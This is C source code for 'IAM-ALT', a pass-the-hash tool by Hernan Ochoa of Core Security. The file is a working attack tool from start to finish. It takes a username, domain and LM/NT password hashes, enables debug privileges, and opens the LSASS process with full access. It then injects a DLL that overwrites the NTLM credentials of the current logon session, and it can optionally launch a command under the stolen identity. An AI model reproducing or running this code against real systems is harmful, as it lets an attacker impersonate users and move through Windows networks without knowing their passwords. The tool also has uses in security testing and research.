// $Id: iam-alt.c,v 1.7 2008/06/12 19:54:05 hochoa Exp $
//
#include <windows.h>
#include <string.h>
#include <ntsecapi.h>
#include <stdio.h>
#include <psapi.h>
#include <tlhelp32.h>
#include "..\whosthere-alt\injectdll.h"
#include "..\whosthere-alt\pth.h"
#include "..\whosthere-alt\getopt.h"

/*
 * iam-alt.c
 *
 * Description:  iam (alternative method)
 *
 * Author: Hernan Ochoa (hochoa@coresecurity.com) (hernan@gmail.com)
 *
 * Copyright (c) 2007-2008 Hernan Ochoa, Buenos Aires, Argentina.
 * All rights reserved.
 *
 *
 * THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED
WARRANTIES
 * ARE DISCLAIMED. IN NO EVENT SHALL CORE SDI S.A. BE LIABLE FOR ANY
DIRECT,
 * INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY OR CONSEQUENTIAL DAMAGES
 * RESULTING FROM THE USE OR MISUSE OF ANY RECOMPILATION OF THIS SOURCE
 * CODE NOT PROVIDED BY CORE SDI S.A.
 **/

#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)

static BOOL g_debugEnabled			= FALSE;
static BOOL g_HashParamsOK			= FALSE;

static char g_Username[MAX_USERNAME_LEN];
static char g_Domainname[MAX_DOMAIN_LEN];
static char g_NThash_ascii[32];
static char g_LMhash_ascii[32];
static unsigned char g_NThash_bytes[16];
static unsigned char g_LMhash_bytes[16];

#pragma  pack(1)
typedef struct  {
	
	char username[1024];
	char domain[1024];
	char authpkg[1024];
	LUID logonID;
	BYTE LMhash[32];
	BYTE NThash[32];
	
} PTH_LOGON_SESSION_DATA;

typedef (*CreateProcessWithLogonWFunc)(LPCWSTR lpUsername, LPCWSTR lpDomain, LPCWSTR lpPassword, DWORD dwLogonFlags, LPCWSTR lpApplicationName, LPWSTR lpCommandLine, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCWSTR lpCurrentDirectory, LPSTARTUPINFOW lpStartupInfo, LPPROCESS_INFORMATION lpProcessInfo);
BOOL createProcessAndGetSessionID(char *pszUsername, char *pszDomain, char* pszCmdline, DWORD* pSessionID);
void ParseCmdline(char *cmdline, char* out_username, char* out_domain, char* out_lmhashstr, char* out_nthashstr, char *out_lmbytes, char *out_ntbytes);

BOOL createProcessAndGetSessionID(char *pszUsername, char *pszDomain, char* pszCmdline, DWORD* pSessionID)
{
char *pwd = "\x00\x00\x00\x00";
char *Wusername;
char *Wdomain;
char *Wcmdline;
DWORD ddNeededSize;
STARTUPINFOW si;
PROCESS_INFORMATION pi;
CreateProcessWithLogonWFunc create;
BOOL bRet;
HANDLE hProc;
TOKEN_STATISTICS tokenStats;

	if( pszUsername == NULL || pszDomain == NULL || pszCmdline == NULL || pSessionID == NULL )
		return FALSE;

	create = NULL;
	create = (CreateProcessWithLogonWFunc) GetProcAddress(LoadLibrary("advapi32.dll"), "CreateProcessWithLogonW");
	if( create == NULL ) {
		printf("Can't find CreateProcessWithLogonW\n");
		return FALSE;
	}

	Wusername = (char*)malloc( (strlen(pszUsername)+4)*sizeof(wchar_t));
	Wdomain = (char*)malloc( (strlen(pszDomain)+4)*sizeof(wchar_t));
	Wcmdline = (char*)malloc( (strlen(pszCmdline)+4)*sizeof(wchar_t));

	if( Wusername==NULL || Wdomain == NULL || Wcmdline == NULL )
		return FALSE;

	if( MultiByteToWideChar(
			CP_ACP,
			0, 
			pszUsername, -1,
			(LPWSTR)Wusername, strlen(pszUsername)+1) == 0 ) 
	{

			printf("Error\n");

			free(Wusername);
			free(Wdomain);
			free(Wcmdline);
			return FALSE;
	}


	if( MultiByteToWideChar(
			CP_ACP, 0,
			pszDomain, -1,
			(LPWSTR)Wdomain, strlen(pszDomain)+1) == 0 )
	{

			free(Wusername);
			free(Wdomain);
			free(Wcmdline);
			return FALSE;
	
	}


	if( MultiByteToWideChar(CP_ACP, 0,
			pszCmdline, -1,
			(LPWSTR)Wcmdline, strlen(pszCmdline)+1) == 0 ) 
	{

			free(Wusername);
			free(Wdomain);
			free(Wcmdline);
			return FALSE;
	}

	


	ZeroMemory( &si, sizeof(si));
	ZeroMemory( &pi, sizeof(pi));
	si.cb = sizeof(si);

	bRet = create(
			(LPCWSTR)Wusername,
			(LPCWSTR)Wdomain,
			(LPCWSTR)pwd,
			2, /* LOGON_CREDENTIALS_ONLY */
			NULL,
			(LPWSTR)Wcmdline,
			CREATE_NEW_CONSOLE, 
			NULL, NULL,
			&si,
			&pi);

	if( bRet == FALSE ) {
			//printf("ERROR: CreateProcessWithLogonW\n");
			if(Wusername) free(Wusername);
			if(Wdomain) free(Wdomain);
			if(Wcmdline) free(Wcmdline);
			return FALSE;
	}

	bRet = OpenProcessToken(
			pi.hProcess,
			TOKEN_READ, 
			&hProc);

	
	if( bRet == FALSE ) {
		if(Wusername) free(Wusername);
		if(Wdomain) free(Wdomain);
		if(Wcmdline) free(Wcmdline);
		TerminateProcess( pi.hProcess, 0);
		return FALSE;
	}

	bRet = GetTokenInformation( 
			hProc,
			TokenStatistics,
			&tokenStats,
			sizeof(tokenStats),
			&ddNeededSize);

	if( bRet == FALSE ) {
		CloseHandle( hProc );
		if(Wusername) free(Wusername);
		if(Wdomain) free(Wdomain);
		if(Wcmdline) free(Wcmdline);
		TerminateProcess( pi.hProcess, 0);
		//printf("Error in GetTokenInformation\n");
		return FALSE;
	}


	*pSessionID = (DWORD) tokenStats.AuthenticationId.LowPart;
	CloseHandle( hProc );

	if(Wusername) free(Wusername);
	if(Wdomain) free(Wdomain);
	if(Wcmdline) free(Wcmdline);

	return TRUE;	
}


void ParseCmdline(char *cmdline, char* out_username, char* out_domain, char* out_lmhash, char* out_nthash, char *out_lmbytes, char *out_ntbytes)
{
int sep_count;
char *tmp;
char username[MAX_USERNAME_LEN], domain[MAX_USERNAME_LEN], lmhashstr[MAX_USERNAME_LEN], nthashstr[MAX_USERNAME_LEN];
unsigned int n, j =0, num;
char nums[10];

	if(cmdline == NULL || out_username == NULL || out_domain == NULL || out_lmhash == NULL || out_nthash == NULL
	   || out_lmbytes == NULL || out_ntbytes == NULL) {
		printf("Error in cmdline!. Bye!.\n");
		exit(0);
	}

	sep_count = 0;
	tmp = cmdline;
//	printf("%p\n", tmp);

	// strchr is executed one more time that needed, but oh well
	while(  ((tmp=strchr( tmp, ':')) != NULL) ) {

//		printf("%p\n", tmp);	
		tmp++;
		sep_count++;
		if( sep_count > 3 ) {
			printf("Error in cmdline!. Credentials format is wrong! too many ':' characters!\n");
			exit(0);
		}


	}

	if( sep_count < 3 ) {
		printf("Error in cmdline!. Credentials format is wrong! too few ':' characters!\n");
		exit(0);
	}

//	printf("count: %d\n", sep_count);

	tmp = cmdline;
	n = 0;
	while( *tmp != ':') {
	
		username[n++] = *tmp++;
		if( n > sizeof(username)-2) {
			printf("username is too long!.\n");
			exit(0);
		}

	}

	if( n < 1 ) {
		printf("username wrong format!.\n");
		exit(0);
	}
	username[ sizeof(username)-1 ] = '\0';
	username[ n ] = '\0';
//	puts(username);
	// careful...
	strcpy( out_username, username);
	
	n = 0;
	tmp++;
	while( *tmp != ':') {
		domain[n++] = *tmp++;
		if( n > sizeof(domain)-2) {
			printf("domain is too long!.\n");
			exit(0);
		}
	}

	if( n < 1 ) {
		printf("domain wrong format!.\n");
		exit(0);
	}

	domain[ sizeof(domain)-1] = '\0';
	domain[ n ] = '\0';
//	puts(domain);
	// careful..
	strcpy( out_domain, domain);

	n = 0;
	tmp++;
	while( *tmp != ':') {
		lmhashstr[n++] = *tmp++;
		if( n > sizeof(lmhashstr)) {
			printf("lmhash is too long!.\n");
			exit(0);
		}
	}

	if( n != 32 ) {
		printf("lmhash wrong format!.\n");
		exit(0);
	}

//	for(n=0; n<32; n++) {
//		printf("%c", lmhashstr[n]);
//	}
//	printf("\n");
	// Careful.. 
	memcpy( out_lmhash, lmhashstr, 32);

	n = 0;
	tmp++;
	while( *tmp != '\x00' || *tmp == ' ') {
		nthashstr[n++] = *tmp++;
		if( n > sizeof(nthashstr)) {
			printf("nthash is too long!.\n");
			exit(0);
		}
	}

	if( n != 32 ) {
		printf("nthash wrong format!.\n");
		exit(0);
	}

//	for(n=0; n<32; n++) {
//		printf("%c", nthashstr[n]);
//	}
//	printf("\n");
	// Careful...
	memcpy( out_nthash, nthashstr, 32);
	
	// convert char to bytes for LM & NT hashes
	for(n =0, j=0; n<32; n+=2, j++) {
		
		memset(nums, 'x00', 3);
		nums[0] = lmhashstr[n];
		nums[1] = lmhashstr[n+1];
		num = strtoul( &nums[0], NULL, 16 );
		out_lmbytes[j] = num;
		memset(nums, 'x00', 3);
		nums[0] = nthashstr[n];
		nums[1] = nthashstr[n+1];
		num = strtoul( &nums[0], NULL, 16 );
		out_ntbytes[j] = num;
		
	}

}


 
// Return: 0 = error
DWORD GetLogonID(void)
{
	TOKEN_STATISTICS TokenStats;
	HANDLE hToken;
	BOOL bStatus;
	DWORD nBytes;
	DWORD logonIDlow;
	DWORD logonIDhigh;


	logonIDlow = logonIDhigh = 0;
	bStatus = OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken);
	if (bStatus)
	{
		bStatus = GetTokenInformation(hToken, TokenStatistics,
			&TokenStats, sizeof(TokenStats), &nBytes);
		if (bStatus)
		{
			logonIDlow = TokenStats.AuthenticationId.LowPart;
			logonIDhigh = TokenStats.AuthenticationId.HighPart;
			bStatus = TRUE;
		}
	}

	
	return logonIDlow;
}
 

DWORD GetPidByName( char* szProcessName )
{
HANDLE hProcessSnap;
HANDLE hProcess;
PROCESSENTRY32 pe32;

	if( !szProcessName ) return 0;

	// Take a snapshot of all processes in the system.
	hProcessSnap = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );
	if( hProcessSnap == INVALID_HANDLE_VALUE )
	{
		return 0;
	}

	// Set the size of the structure before using it.
	pe32.dwSize = sizeof( PROCESSENTRY32 );

	// Retrieve information about the first process,
	// and exit if unsuccessful
	if( !Process32First( hProcessSnap, &pe32 ) )
	{
		CloseHandle( hProcessSnap );          // clean the snapshot object
		return 0;
	}

	// Now walk the snapshot of processes, and
	// display information about each process in turn
	do
	{

		if( strstr( pe32.szExeFile, szProcessName) )
		{
			CloseHandle( hProcessSnap );
			return (DWORD)pe32.th32ProcessID;
		}


	} while( Process32Next( hProcessSnap, &pe32 ) );

	CloseHandle( hProcessSnap );
	return 0;
}



void banner(void)
{

	printf("IAM-ALT v1.1 - by Hernan Ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 Core Security Technologies\n");
	printf("This tool allows you to change the NTLM credentials of the current logon session\n");

}

void help(void)
{
	printf("Options:  \n");
	printf("\t-D\t\tprints debug information\n");
	printf("\t-h\t\tusername:domainname:lmhash:nthash\n");
	printf("\t-r\t\t<cmd>. Create a new logon session and run a command with the specified credentials (e.g.: -r cmd.exe)\n\n");

}


int main(int argc, char **argv)
{
HANDLE hLSASS;
DWORD dwLSASS_pid;
char buffer[1024];
BOOL bRet;
int j;
unsigned int n=0, x=0, y=0;
PBYTE pTemp;
DWORD credPtr;
LUID currentLogonID;
ULONG ulLogonSessionsCount;
ULONG ulValidLogonSessionsCount;
NTSTATUS retval;
PTH_LOGON_SESSION_DATA pthLogonSessionData;
INJECTDLLANDCALLPARAM injectparams;
PTHPARAMS* pPthparams;
char szCurrentDir[1024];
char szDlltoinjectName[1024];
char szRunCommand[8192];

		banner();
		
		if( argc < 2) {
			help();
			return 0;
		}

		ZeroMemory( szRunCommand, sizeof(szRunCommand) );

		// check if pth.dll is in the current directory
		// if it is not, throw an error and exit.
		if( !GetFileAttributes(".\\pth.dll") ) {
			printf("Error: pth.dll is not in the current directory!.\n");
			exit(0);
		}

		// check parameters
		while(1) {
			unsigned int c = getopt(argc, argv, "-Dh:r:");
			if( c == -1 ) break;
			
			switch( c ) {
				case 'D': g_debugEnabled = 1; break;
				case 'h':
					ParseCmdline((char*)optarg, g_Username, g_Domainname, g_LMhash_ascii, g_NThash_ascii,
						     g_LMhash_bytes, g_NThash_bytes);
					g_HashParamsOK = TRUE;
					break;
				case 'r':
					  ZeroMemory( szRunCommand, sizeof( szRunCommand ) );
					  strncpy( szRunCommand, optarg, sizeof(szRunCommand)-1 );
					  szRunCommand[sizeof(szRunCommand)-1] = '\x00';
					 break;
				
				default:
					help();
					return 0;
					
					
				
			}
			
		}

		if( g_HashParamsOK == FALSE) {
			
			printf("You didn't supply credentials!\n");
			return 0;
			
		}


		if( EnableDebugPrivs() == FALSE ) {
					printf("Could not enable debug privileges. You must run this tool with an account with administrator privileges.\n");
					exit(0);
		}

		memset(buffer, '\0', 1024);

		dwLSASS_pid = GetPidByName("lsass.exe");
		if( dwLSASS_pid == 0 ) {
			printf("Cannot get LSASS.EXE PID!\n");
			exit(0);
		}

		hLSASS = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwLSASS_pid);

		if( g_debugEnabled ) {

			printf("LSASS HANDLE: %x\n", hLSASS);

		}
		if( hLSASS == INVALID_HANDLE_VALUE ) {
			printf("Error: Cannot open LSASS.EXE!.\n");
			exit(0);
		}
	
	
		if( strlen(szRunCommand) > 0 ) {

			currentLogonID.HighPart = 0;
		 	if( createProcessAndGetSessionID(g_Username,
				       	g_Domainname,
					szRunCommand,
				       	&currentLogonID.LowPart 
					) == FALSE ) 
			{
				printf("cannot run the specified program!");
				exit(0);

			}

		} else {

			// Now get current logon ID
			currentLogonID.LowPart = GetLogonID();
			currentLogonID.HighPart = 0;
		}

		
		if( g_debugEnabled ) {
			printf("Current LogonID: %.8Xh\n", currentLogonID.LowPart);
		}
		
                // we allocate the PTHPARAM structure to call the function inside LSASS.EXE
                pPthparams = (PTHPARAMS*)malloc( sizeof(PTHPARAMS) );
		if( pPthparams == NULL ) {
				printf("Cannot alloc pthparams!.");
				exit(0);
				
		}
		
		injectparams.param = (BYTE*)pPthparams;
		injectparams.param_len = sizeof(PTHPARAMS);
                strcpy( injectparams.functionName, "AddCredentials" );
		
		memset( szCurrentDir, '\x00', sizeof(szCurrentDir));
		memset( szDlltoinjectName, '\x00', sizeof(szDlltoinjectName));
		GetCurrentDirectory(  sizeof(szCurrentDir)-1, szCurrentDir );
		szCurrentDir[ sizeof(szCurrentDir)-1 ] = '\x00';
		_snprintf( szDlltoinjectName, sizeof(szDlltoinjectName)-1, "%s\\%s", szCurrentDir, "pth.dll");
                
                              
                pPthparams->LogonID = currentLogonID;
		pPthparams->bRet = FALSE;
		
		memset(pPthparams->domainname, '\x00', MAX_DOMAIN_LEN);
		strncpy(pPthparams->domainname, g_Domainname, MAX_DOMAIN_LEN-1);
		pPthparams->domainname[MAX_DOMAIN_LEN-1] = '\x00';

		memset(pPthparams->username, '\x00', MAX_USERNAME_LEN);
		strncpy(pPthparams->username, g_Username, MAX_USERNAME_LEN-1 );
		pPthparams->username[MAX_USERNAME_LEN-1] = '\x00';

		
		
		memcpy(pPthparams->NThash, g_NThash_bytes, 16);
		memcpy(pPthparams->LMhash, g_LMhash_bytes, 16);
	
                                
                // Now we try to inject the DLL that will change the credentials
		if ( InjectDllAndCallFunction( GetPidByName("lsass.exe"), szDlltoinjectName, &injectparams) == FALSE )
                {
		        printf("Error in InjectDllAndCallFunction");
                }
                else {
		
		        if( pPthparams->bRet == TRUE ) {
                                                
				printf("the credentials were successfully changed!\n");
                                                
        
        		} else {
				
	        		printf("An error occurred changing the credentials.\n");						
	
				
			}
			
		}
				
	
		free( pPthparams );

}
